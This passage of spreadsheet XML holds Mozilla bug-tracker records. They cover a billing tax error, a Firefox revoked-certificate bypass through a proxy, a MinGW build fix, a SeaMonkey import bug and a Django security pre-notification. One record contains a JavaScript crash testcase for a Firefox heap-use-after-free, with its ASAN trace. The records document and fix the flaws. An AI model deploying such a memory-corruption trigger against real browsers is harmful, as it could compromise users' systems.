      <c r="W5406" t="inlineStr">
        <is>
          <t>Created attachment 740922
Screenshot of Invoice for prepay SIM card
Purchase was made on direct bill of apps for .89 euros.  This is inclusive of spain tax of 21%.  Instead, 21% was added on top of the .89 Euro price to bill user for 1.08.    I suspect this is a problem for all price tiers.</t>
        </is>
      </c>
      <c r="X5406" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5407">
      <c r="A5407" t="n">
        <v>1770123</v>
      </c>
      <c r="B5407" t="inlineStr">
        <is>
          <t>2022-05-19 01:23:47 -0700</t>
        </is>
      </c>
      <c r="C5407" t="inlineStr">
        <is>
          <t>Firefox allows user to visit webpages with revoked certificate when non-resolving proxy is set</t>
        </is>
      </c>
      <c r="D5407" t="inlineStr">
        <is>
          <t>2023-01-16 20:32:11 -0800</t>
        </is>
      </c>
      <c r="E5407" t="n">
        <v>1</v>
      </c>
      <c r="F5407" t="n">
        <v>1</v>
      </c>
      <c r="G5407" t="n">
        <v>3</v>
      </c>
      <c r="H5407" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5407" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5407" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K5407" t="inlineStr">
        <is>
          <t>Firefox 100</t>
        </is>
      </c>
      <c r="L5407" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5407" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5407" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5407" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5407" t="inlineStr">
        <is>
          <t>[necko-triaged][adv-main102+][adv-esr91.11+]</t>
        </is>
      </c>
      <c r="Q5407" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5407" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S5407" t="inlineStr">
        <is>
          <t>103 Branch</t>
        </is>
      </c>
      <c r="T5407" t="n">
        <v>1</v>
      </c>
      <c r="U5407" t="n">
        <v>0</v>
      </c>
      <c r="V5407" t="n">
        <v>41</v>
      </c>
      <c r="W5407" t="inlineStr">
        <is>
          <t>Hello
On my work laptop, I've a proxy setup (via a .pac file) in GNOME configuration. In Firefox, the configuration is set to use the system settings.
With the proxy is setup (when I'm disconnected from the VPN, the pac file or the proxy is not reachable, so it doesn't seem to matter if the proxy is actually used) if I go to https://revoked.badssl.com/ I get a red scary page telling me that I shouldn't be seeing this.
As soon as I disable the proxy in the GNOME configuration, I'm getting the SEC_ERROR_REVOKED_CERTIFICATE as expected.</t>
        </is>
      </c>
      <c r="X5407" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5408">
      <c r="A5408" t="n">
        <v>1460668</v>
      </c>
      <c r="B5408" t="inlineStr">
        <is>
          <t>2018-05-10 10:08:11 -0700</t>
        </is>
      </c>
      <c r="C5408" t="inlineStr">
        <is>
          <t>Bump MinGW version to fix CD3D11_BLEND_DESC definition</t>
        </is>
      </c>
      <c r="D5408" t="inlineStr">
        <is>
          <t>2019-04-21 18:26:24 -0700</t>
        </is>
      </c>
      <c r="E5408" t="n">
        <v>1</v>
      </c>
      <c r="F5408" t="n">
        <v>1</v>
      </c>
      <c r="G5408" t="n">
        <v>7</v>
      </c>
      <c r="H5408" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I5408" t="inlineStr">
        <is>
          <t>Firefox Build System</t>
        </is>
      </c>
      <c r="J5408" t="inlineStr">
        <is>
          <t>General: Unsupported Platforms</t>
        </is>
      </c>
      <c r="K5408" t="inlineStr">
        <is>
          <t>3 Branch</t>
        </is>
      </c>
      <c r="L5408" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5408" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5408" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5408" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5408" t="inlineStr"/>
      <c r="Q5408" t="inlineStr">
        <is>
          <t>P5</t>
        </is>
      </c>
      <c r="R5408" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5408" t="inlineStr">
        <is>
          <t>mozilla62</t>
        </is>
      </c>
      <c r="T5408" t="n">
        <v>1</v>
      </c>
      <c r="U5408" t="n">
        <v>0</v>
      </c>
      <c r="V5408" t="n">
        <v>10</v>
      </c>
      <c r="W5408" t="inlineStr">
        <is>
          <t>When `gfx.direct2d.disabled` and `layers.acceleration.disabled` are disabled (so the features are enabled) - the browser crashes.
This is the result of a MinGW bug:
&gt; for(D3D11_RENDER_TARGET_BLEND_DESC *target; target &lt; RenderTarget+D3D11_SIMULTANEOUS_RENDER_TARGET_COUNT; target++) {
should be
&gt; for(D3D11_RENDER_TARGET_BLEND_DESC *target = RenderTarget; target &lt; RenderTarget+D3D11_SIMULTANEOUS_RENDER_TARGET_COUNT; target++) {
This should just be as simple as bumping the MinGW version.</t>
        </is>
      </c>
      <c r="X5408" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5409">
      <c r="A5409" t="n">
        <v>134947</v>
      </c>
      <c r="B5409" t="inlineStr">
        <is>
          <t>2002-04-02 13:07:04 -0800</t>
        </is>
      </c>
      <c r="C5409" t="inlineStr">
        <is>
          <t>Import text dialog unusable</t>
        </is>
      </c>
      <c r="D5409" t="inlineStr">
        <is>
          <t>2004-11-22 17:25:08 -0800</t>
        </is>
      </c>
      <c r="E5409" t="n">
        <v>1</v>
      </c>
      <c r="F5409" t="n">
        <v>1</v>
      </c>
      <c r="G5409" t="n">
        <v>2</v>
      </c>
      <c r="H5409" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5409" t="inlineStr">
        <is>
          <t>SeaMonkey</t>
        </is>
      </c>
      <c r="J5409" t="inlineStr">
        <is>
          <t>MailNews: Address Book &amp; Contacts</t>
        </is>
      </c>
      <c r="K5409" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5409" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5409" t="inlineStr">
        <is>
          <t>Windows ME</t>
        </is>
      </c>
      <c r="N5409" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5409" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5409" t="inlineStr">
        <is>
          <t>[adt1]</t>
        </is>
      </c>
      <c r="Q5409" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5409" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5409" t="inlineStr">
        <is>
          <t>mozilla1.0</t>
        </is>
      </c>
      <c r="T5409" t="n">
        <v>1</v>
      </c>
      <c r="U5409" t="n">
        <v>0</v>
      </c>
      <c r="V5409" t="n">
        <v>62</v>
      </c>
      <c r="W5409" t="inlineStr">
        <is>
          <t>Trunk build 2002-04-01: WinMe, Mac 10.1.3
haven't checked linux yet.
Overview: Import an address book in text format and the dialog is unusable.
Steps to reproduce:
1. Export an address book in tab format (select File|Export, and choose the drop 
down for Tab Delimeted *.tab, *.txt)
2. Import the same address book 
Actual Results: The dialog which shows me the fields to import and how to map 
them is cutoff at the top. After selecting the OK button the name of the new 
address book appears but no cards are present. This is probably because I cannot 
 manipulate the dialog which maps the data with the appropriate field.
I tried importing a *.tab file from 4.x but again it imports as an empty address 
book.</t>
        </is>
      </c>
      <c r="X5409" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5410">
      <c r="A5410" t="n">
        <v>841767</v>
      </c>
      <c r="B5410" t="inlineStr">
        <is>
          <t>2013-02-15 08:18:56 -0800</t>
        </is>
      </c>
      <c r="C5410" t="inlineStr">
        <is>
          <t>Upcoming Django and Python security releases (1.3.6/1.4.4/1.5rc2)</t>
        </is>
      </c>
      <c r="D5410" t="inlineStr">
        <is>
          <t>2016-03-04 07:33:14 -0800</t>
        </is>
      </c>
      <c r="E5410" t="n">
        <v>1</v>
      </c>
      <c r="F5410" t="n">
        <v>1</v>
      </c>
      <c r="G5410" t="n">
        <v>5</v>
      </c>
      <c r="H5410" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5410" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J5410" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5410" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5410" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5410" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5410" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5410" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5410" t="inlineStr">
        <is>
          <t>u=user c=site p=1 s=2013.4</t>
        </is>
      </c>
      <c r="Q5410" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5410" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5410" t="inlineStr">
        <is>
          <t>2013Q1</t>
        </is>
      </c>
      <c r="T5410" t="n">
        <v>1</v>
      </c>
      <c r="U5410" t="n">
        <v>0</v>
      </c>
      <c r="V5410" t="n">
        <v>11</v>
      </c>
      <c r="W5410" t="inlineStr">
        <is>
          <t>Created attachment 714391
zip file of patches
We got a security pre-notification from the Django project and a tip that Python may also release a new version addressing a vulnerability in a stdlib XML package.
Both releases are expected on Tuesday, 19 February.
There are 4 issues addressed in these releases (1.3.6, 1.4.4, and 1.5rc2) and upgrades need to be performed ASAP. The full notification is below.
===============================================
You're receiving this message because you are on the security
pre-notification list for the Django web framework; information about
this list can be found in our security policy[1].
In accordance with that policy, on Tuesday, February 19, 2013, the
Django project will be issuing a set of releases to remedy several
security issues reported to us. This message contains a description of
the issues, a description of the changes which will be made to Django,
and the patches which will be applied to Django.
Issue: Host header poisoning
============================
Several previous Django security releases have attempted to address
persistent issues with the HTTP ``Host`` header. Django contains code
-- and some functionality shipped with Django itself makes use of that
code -- for constructing a fully-qualified URL based on the incoming
HTTP request. Depending on configuration, this makes use of the
``Host`` header, and so an attacker who can cause a Django application
to respond to arbitrary ``Host`` headers can cause Django to generate,
and display to end users, URLs on arbitrary domains.
Previous iterations of this issue (see CVE-2011-4139 and
CVE-2012-4520) have focused on tightening Django's parsing of ``Host``
headers, to eliminate various means by which attackers -- using
techniques such as username/password pairs in their submitted ``Host``
header -- could exploit this.
Ultimately, however, Django alone cannot ensure that an attacker is
unable to submit, and cause Django to accept, arbitrary ``Host``
headers. Properly securing this in a deployed Django instance
additionally requires configuration of the web server, and both the
configuration and the achievable level of security vary with the
server being used.
In light of this, the ``get_host()`` method of
``django.http.HttpRequest`` will now validate the ``Host`` header
against a new setting, ``ALLOWED_HOSTS``. This setting is a
list of strings (by default, an empty list) corresponding to
acceptable values for the header, with some support for wildcards.
Code which does not use ``get_host()``, or Django configurations which
can determine the current hostname without recourse to HTTP headers
(i.e., when Django's sites framework is enabled) will not be affected
by this change.
Issue: XML entity expansion attacks
===================================
Django's serialization framework includes support for serializing to,
and deserializing from, XML. Django's XML deserialization is
vulnerable to entity-expansion attacks.
To remedy this, Django's XML deserializer will now skip processing of
external entities. As this vulnerability is also present in the
underlying XML-handling modules of the Python standard library, a
security release of Python addressing the issue at that level is
expected simultaneous with Django's release.
Issue: Data leakage via admin history log
=========================================
Django's bundled administrative interface keeps a log of actions
taken, preserving the history of any object which is exposed through
the admin interface. This history view does not perform any permission
checks beyond confirming that the user has access to the
administrative interface; as such, any user with admin access can view
the history of any object accessible in the admin interface, and see
summaries of each change made to an object.
To remedy this, the admin history view for an object will now perform
the same permission checks as other admin views for the same object.
Issue: Formset denial-of-service when max_num not set
=====================================================
Django's form library includes tools for generating formsets --
multiple instances of a single form, to be submitted simultaneously
(e.g., for mass editing/updating of similar objects). Formsets allow a
parameter, ``max_num``, specifying the maximum number of individual
forms which may be included. The number of forms being submitted is
included in a hidden field in the formset; when ``max_num`` is
specified, this value is validated against ``max_num``.
When ``max_num`` is not specified, however, Django accepts the
submitted hidden value, and attempts to instantiate that many form
objects. Sufficiently large values will result in extreme memory
consumption; values exceeding ``sys.maxint`` will, in this case,
result in an HTTP 500 response (due to an uncaught ``OverflowError``
from the over-large value). In either case, the result is an effective
denial-of-service attack.
To resolve this, Django will now supply a (suitably large) default
value for ``max_num``. Application developers can still manually
specify ``max_num`` to suit the needs of their applications, but
absent this the default value -- 1000 -- will ensure that attackers
cannot cause overflow errors or excessive memory consumption.
Affected versions
=================
The issues described above affect the following versions of Django:
* Django master development branch
* Django 1.5 release branch (soon to become Django 1.5)
* Django 1.4 release branch
* Django 1.3 release branch
Resolution
==========
Included with this email are patches implementing the changes
described above, for each affected version of Django. These patches
will be applied to the Django development repository on Tuesday,
February 19, 2013, and the following releases will be issued along
with disclosure of the reasons for these changes:
* Django 1.5 release candidate  2
* Django 1.4.4
* Django 1.3.6
As Django's master development branch is currently in a pre-alpha
state, and the 1.5 branch is in a pre-release state, users are
strongly advised not to be running production deployments from them;
the disclosure announcement will nonetheless include a reminder of
this and encourage any such users to update their checkouts
immediately.</t>
        </is>
      </c>
      <c r="X5410" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5411">
      <c r="A5411" t="n">
        <v>1371259</v>
      </c>
      <c r="B5411" t="inlineStr">
        <is>
          <t>2017-06-08 05:52:59 -0700</t>
        </is>
      </c>
      <c r="C5411" t="inlineStr">
        <is>
          <t>heap-use-after-free in nsComputedDOMStyle::UpdateCurrentStyleSources</t>
        </is>
      </c>
      <c r="D5411" t="inlineStr">
        <is>
          <t>2024-05-30 09:34:10 -0700</t>
        </is>
      </c>
      <c r="E5411" t="n">
        <v>1</v>
      </c>
      <c r="F5411" t="n">
        <v>1</v>
      </c>
      <c r="G5411" t="n">
        <v>3</v>
      </c>
      <c r="H5411" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5411" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5411" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K5411" t="inlineStr">
        <is>
          <t>52 Branch</t>
        </is>
      </c>
      <c r="L5411" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5411" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5411" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5411" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5411" t="inlineStr">
        <is>
          <t>[adv-main55+][adv-esr52.3+]</t>
        </is>
      </c>
      <c r="Q5411" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5411" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5411" t="inlineStr">
        <is>
          <t>mozilla56</t>
        </is>
      </c>
      <c r="T5411" t="n">
        <v>1</v>
      </c>
      <c r="U5411" t="n">
        <v>0</v>
      </c>
      <c r="V5411" t="n">
        <v>103</v>
      </c>
      <c r="W5411" t="inlineStr">
        <is>
          <t>Created attachment 8875704
crash.html
The following testcase crashes the latest ASAN build of Firefox ESR 52.2.0 (20170607010726)
&lt;script&gt;
function start() {
	o0=window.open('data:text/html,&lt;div&gt;','popup65','height=88,width=131081,top=46,outerHeight=-1024,toolbar,resizable');
	o1=window.open('data:text/html,&lt;div&gt;','popup73','height=-1,width=64,outerHeight=38,outerWidth=-8,toolbar,resizable');
	o1.onload=fun0;
}
function fun0(e) {
	o5=o0.document;
	o0.onresize=fun1;
	o45=o5.querySelector('*:not([id])');
	o95=document.createElementNS('http://www.w3.org/1999/xhtml','marquee');
	o45.appendChild(o95);
	o0.resizeBy(8,4194304);
}
function fun1() {
	o0.close();
	o1.open('data:text/html,&lt;div&gt;','popup3','width=1,left=32768,menubar,toolbar,personalbar,status,resizable');
	fuzzPriv.GC();fuzzPriv.CC();fuzzPriv.GC();fuzzPriv.CC();
}
&lt;/script&gt;
&lt;body onload="start()"&gt;&lt;/body&gt;
=================================================================
==1349==ERROR: AddressSanitizer: heap-use-after-free on address 0x60c0008a1ea0 at pc 0x7f65e45838b1 bp 0x7fff56b07810 sp 0x7fff56b07808
WRITE of size 8 at 0x60c0008a1ea0 thread T0
    #0 0x7f65e45838b0 in nsComputedDOMStyle::UpdateCurrentStyleSources(bool) /home/worker/workspace/build/src/layout/style/nsComputedDOMStyle.cpp:639:14
    #1 0x7f65e4583efb in nsComputedDOMStyle::GetPropertyCSSValue(nsAString_internal const&amp;, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/layout/style/nsComputedDOMStyle.cpp:796:3
    #2 0x7f65e4582196 in nsComputedDOMStyle::GetPropertyValue(nsAString_internal const&amp;, nsAString_internal&amp;) /home/worker/workspace/build/src/layout/style/nsComputedDOMStyle.cpp:379:26
    #3 0x7f65e4581fb8 in nsComputedDOMStyle::GetPropertyValue(nsCSSPropertyID, nsAString_internal&amp;) /home/worker/workspace/build/src/layout/style/nsComputedDOMStyle.cpp:317:10
    #4 0x7f65e0ed3ae9 in GetWidth /home/worker/workspace/build/src/layout/style/nsCSSPropList.h:4392:1
    #5 0x7f65e0ed3ae9 in mozilla::dom::CSS2PropertiesBinding::get_width(JSContext*, JS::Handle&lt;JSObject*&gt;, nsDOMCSSDeclaration*, JSJitGetterCallArgs) /home/worker/workspace/build/src/obj-firefox/dom/bindings/CSS2PropertiesBinding.cpp:42528
    #6 0x7f65e243ce3d in mozilla::dom::GenericBindingGetter(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2813:13
    #7 0x7f65e87ba2e5 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
    #8 0x7f65e87ba2e5 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:447
    #9 0x7f65e87baf92 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:523:10
    #10 0x7f65e828c12d in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsapi.cpp:2828:12
    #11 0x7f65df404ea2 in Call /home/worker/workspace/build/src/obj-firefox/dist/include/jsapi.h:3330:12
    #12 0x7f65df404ea2 in xpc::XrayWrapper&lt;js::CrossCompartmentWrapper, xpc::DOMXrayTraits&gt;::get(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;jsid&gt;, JS::MutableHandle&lt;JS::Value&gt;) const /home/worker/workspace/build/src/js/xpconnect/wrappers/XrayWrapper.cpp:2247
    #13 0x7f65e85043ee in js::Proxy::get(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;jsid&gt;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:309:12
    #14 0x7f65e850478c in GetProperty /home/worker/workspace/build/src/js/src/vm/NativeObject.h:1522:16
    #15 0x7f65e850478c in js::Proxy::get(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;jsid&gt;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:305
    #16 0x7f65e87c65e1 in GetProperty /home/worker/workspace/build/src/js/src/vm/NativeObject.h:1522:16
    #17 0x7f65e87c65e1 in GetProperty /home/worker/workspace/build/src/js/src/jsobj.h:846
    #18 0x7f65e87c65e1 in js::GetProperty(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;js::PropertyName*&gt;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:4263
    #19 0x7f65e879eb9c in GetPropertyOperation /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:192:12
    #20 0x7f65e879eb9c in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2639
    #21 0x7f65e877f8ad in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:405:12
    #22 0x7f65e87ba94f in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:477:15
    #23 0x7f65e87baf92 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:523:10
    #24 0x7f65e8289ec2 in JS_CallFunctionValue(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsapi.cpp:2769:12
    #25 0x7f65e3cb130b in Call /home/worker/workspace/build/src/obj-firefox/dist/include/jsapi.h:3310:14
    #26 0x7f65e3cb130b in nsXBLProtoImplAnonymousMethod::Execute(nsIContent*, JSAddonId*) /home/worker/workspace/build/src/dom/xbl/nsXBLProtoImplMethod.cpp:331
    #27 0x7f65e3c7b24e in nsXBLBinding::ExecuteAttachedHandler() /home/worker/workspace/build/src/dom/xbl/nsXBLBinding.cpp:634:5
    #28 0x7f65e3c7b04e in nsBindingManager::ProcessAttachedQueueInternal(unsigned int) /home/worker/workspace/build/src/dom/xbl/nsBindingManager.cpp:419:7
    #29 0x7f65e4aa5009 in ProcessAttachedQueue /home/worker/workspace/build/src/dom/xbl/nsBindingManager.h:105:5
    #30 0x7f65e4aa5009 in PresShell::FlushPendingNotifications(mozilla::ChangesToFlush) /home/worker/workspace/build/src/layout/base/nsPresShell.cpp:4167
    #31 0x7f65e47b721c in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:1836:11
    #32 0x7f65e47c3a61 in mozilla::RefreshDriverTimer::TickRefreshDrivers(long, mozilla::TimeStamp, nsTArray&lt;RefPtr&lt;nsRefreshDriver&gt; &gt;&amp;) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:295:7
    #33 0x7f65e47c34f5 in mozilla::RefreshDriverTimer::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:316:5
    #34 0x7f65e47c601e in applyImpl&lt;mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver, void (mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::*)(mozilla::TimeStamp), StoreCopyPassByValue&lt;mozilla::TimeStamp&gt; , 0&gt; /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:775:12
    #35 0x7f65e47c601e in apply&lt;mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver, void (mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::*)(mozilla::TimeStamp)&gt; /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:781
    #36 0x7f65e47c601e in mozilla::detail::RunnableMethodImpl&lt;void (mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::*)(mozilla::TimeStamp), true, false, mozilla::TimeStamp&gt;::Run() /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:810
    #37 0x7f65ddd178bb in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1216:7
    #38 0x7f65ddd999fc in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/glue/nsThreadUtils.cpp:361:10
    #39 0x7f65deb5140f in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21
    #40 0x7f65deac2fc8 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:232:3
    #41 0x7f65deac2fc8 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:225
    #42 0x7f65deac2fc8 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:205
    #43 0x7f65e40ec19f in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:3
    #44 0x7f65e6166451 in nsAppStartup::Run() /home/worker/workspace/build/src/toolkit/components/startup/nsAppStartup.cpp:283:19
    #45 0x7f65e62fd757 in XREMain::XRE_mainRun() /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4488:10
    #46 0x7f65e62feecd in XREMain::XRE_main(int, char**, nsXREAppData const*) /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4621:8
    #47 0x7f65e62ffd8c in XRE_main /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4712:16
    #48 0x4df91a in do_main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:282:10
    #49 0x4df91a in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:415
    #50 0x7f65f8fc182f in __libc_start_main /build/glibc-9tT8Do/glibc-2.23/csu/../csu/libc-start.c:291
    #51 0x41ba88 in _start (/home/nils/fuzzer3/esr/firefox/firefox+0x41ba88)
0x60c0008a1ea0 is located 96 bytes inside of 128-byte region [0x60c0008a1e40,0x60c0008a1ec0)
freed by thread T0 here:
    #0 0x4b21db in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:38:3
    #1 0x7f65ddbe0354 in SnowWhiteKiller::~SnowWhiteKiller() /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2665:9
    #2 0x7f65ddbdff46 in nsCycleCollector::FreeSnowWhite(bool) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2840:3
    #3 0x7f65ddbe701e in nsCycleCollector::BeginCollection(ccType, nsICycleCollectorListener*) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3826:3
    #4 0x7f65ddbe64dc in nsCycleCollector::Collect(ccType, js::SliceBudget&amp;, nsICycleCollectorListener*, bool) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3651:9
    #5 0x7f65ddbea556 in nsCycleCollector_collect(nsICycleCollectorListener*) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:4144:3
    #6 0x7f65e0a7cb19 in nsJSContext::CycleCollectNow(nsICycleCollectorListener*, int) /home/worker/workspace/build/src/dom/base/nsJSEnvironment.cpp:1440:3
    #7 0x7f65e05aa55d in nsDOMWindowUtils::CycleCollect(nsICycleCollectorListener*, int) /home/worker/workspace/build/src/dom/base/nsDOMWindowUtils.cpp:1340:3
    #8 0x7f65ddd3fec6 in NS_InvokeByIndex /home/worker/workspace/build/src/xpcom/reflect/xptcall/md/unix/xptcinvoke_x86_64_unix.cpp:180:23
    #9 0x7f65df562fbe in Invoke /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:2058:12
    #10 0x7f65df562fbe in Call /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1377
    #11 0x7f65df562fbe in XPCWrappedNative::CallMethod(XPCCallContext&amp;, XPCWrappedNative::CallMode) /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1344
    #12 0x7f65df56a648 in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:999:12
    #13 0x7f65e87ba2e5 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
    #14 0x7f65e87ba2e5 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:447
    #15 0x7f65e879a6ef in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:510:12
    #16 0x7f65e879a6ef in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2922
    #17 0x7f65e877f8ad in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:405:12
    #18 0x7f65e87ba94f in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:477:15
    #19 0x7f65e87baf92 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:523:10
